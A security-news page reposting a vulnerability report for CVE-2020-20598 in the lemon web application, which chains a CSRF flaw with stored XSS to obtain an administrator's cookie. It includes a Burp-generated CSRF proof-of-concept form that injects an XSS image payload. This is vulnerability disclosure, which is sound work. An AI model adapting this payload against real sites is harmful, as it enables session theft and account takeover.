Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-20598: Csrf + Xss combination Can be obtained user cookie · Issue #199 · xuhuisheng/lemon

A cross-site scripting (XSS) vulnerability in the Editing component of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.

CVE
Open in Source
#xss#csrf#vulnerability#web#git

Product Homepage: http://www.mossle.com/index.do
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.
There is an xss in the place of Editing component

1571127417546

We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie

Csrf Exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.mossle.com/portal/save.do" method="POST">
      <input type="hidden" name="portalWidgetId" value="5557079425024" />
      <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1571127847476

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE